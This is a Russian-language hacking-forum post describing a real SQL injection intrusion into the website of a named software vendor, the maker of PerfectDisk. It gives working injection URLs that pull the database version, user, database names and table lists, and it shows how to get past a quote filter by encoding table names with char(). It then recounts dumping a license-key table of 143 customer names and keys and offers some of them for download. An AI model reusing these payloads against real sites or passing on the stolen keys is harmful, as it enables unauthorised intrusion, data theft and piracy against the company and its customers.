Форум АНТИЧАТ

Т.к. инфа не вызвала интерес в опр. кругах, решил выложить в паблик может кому пригодится...

Просматривая как-то раздел "Сборник полезных прог(маст хев)" наткнулся на одну прогу:

Название проги:
PerfectDisk
Тип проги:
дефрагментатор
Лицензия:
Shareware
Подробное описание:
Мощный дефрагментатор жесткого диска, разработанный при поддержке Microsoft. Мне например отдефрагментировал диск который немогла отдефрагментирвать не одна программа до этого
Линк для закачки:
http://www.raxco.com/products/perfectdisk2k/

И так оф.сайт компании www.raxco.com

Веб-сервер IIS, ну думаю наверно MSSQL и не ошибся.

Порывшись немного нашел скуль:

Код:

http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=183+and+1

Далее стандартно версия, пользователь, имя БД:

Код:

http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=1+or+1=@@version--

http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=1+or+1=(select+system_user)--

http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=1+or+1=(select+db_name())--

Version:Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
User:webman - оказался полный лох =\ никаких прав на master(процедуры) и права на добавление, изменение, удаление даже в своей БД.
DB:Testimonials
Далее узнаем имена таблиц:

Код:

http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES

Но дальнейший вывод таблиц не катил - причина фильтрация кавычек!
Обходим:

Код:

http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN(char(84)%2Bchar(95)%2bchar(84)%2bchar(101)%2bchar(115)%2bchar(116)%2bchar(105)%2bchar(109)%2bchar(111)%2bchar(110)%2bchar(105)%2bchar(97)%2bchar(108)%2bchar(115)))--

Причем ручками преобразовывать каждое имя к последовательности чаров, запарило пришлось писать маленький конвертор на пхп...(ничего сложного)
В результате в данной базе ниодной интересной таблицы =\
Сосвсем расстроился, но через несколько разделов сайта еще скуль:

Код:

http://www.raxco.com/products/commerce/purchase_options.cfm?ItemTitleID=1+or+1=(select+db_name())--

причем другая база!!!
DB:RaxcoEcommerce - только одно название чего стоит =)
Вытаскивал таблы минут 15, ппц запарился и все в ручную, приведу лишь малую часть запроса:

Код:

http://www.raxco.com/products/commerce/purchase_options.cfm?ItemTitleID=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+LIKE+char(84)%2Bchar(95)%2Bchar(66)%2Bchar(101)%2Bchar(115)%2Bchar(116)%2Bchar(37)+AND+TABLE_NAME+NOT+IN(char(84)%2Bchar(95)%2Bchar(73)%2Bchar(116)%2Bchar(101)%2Bchar(109)%2Bchar(84)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101),char(84)%2Bchar(95)%2Bchar(80)%2Bchar(68)%2Bchar(82)%2Bchar(88)%2Bchar(76)%2Bchar(105)%2Bchar(99)%2Bchar(101)%2Bchar(110)%2Bchar(115)%2Bchar(101)%2Bchar(75)%2Bchar(101)%2Bchar(121)%2Bchar(115),char(84)%2Bchar(95)%2Bchar(66)%2Bchar(101)%2Bchar(115)%2Bchar(116)%2Bchar(80)%2Bchar(114)%2Bchar(105)%2Bchar(99)%2Bchar(101)%2Bchar(95)%2Bchar(71)%2Bchar(77),char(84)%2Bchar(95)%2Bchar(66)%2Bchar(101)%2Bchar(115).......

В результате имеем таблицы:

Код:

sysconstraints

syssegments

T_BestPrice_DR

T_BestPrice_FR

T_BestPrice_GM

T_BestPrice_UK

T_CountryCodes

T_ExchangeRates

T_Item

T_ItemNFR

T_ItemTitle

T_Order

T_OrderItem

T_PDRXLicenseKeys

T_ProductDownload

T_PromoCodes

T_SAOrder

T_SAReorder

T_TrackingCodes

T_Values

T_WebToOnyx

Интересная естественно T_PDRXLicenseKeys, смотрим колонки:
[T_PDRXLicenseKeys]

Код:

CreateDate 

CreatedBy 

CustomerEmail 

CustomerName 

LicenseId 

LicenseKey

Ну а дальше дампим с помощью скрипта cash(ему кста огромный респ!) колонки CustomerName, LicenseKey
В результате 143 лиценцзии в формате name:key!
Здесь первые пять, думаю всем хватит:
скачать
Здесь описалово продукта http://www.raxco.com/products/PerfectDiskRxSuite/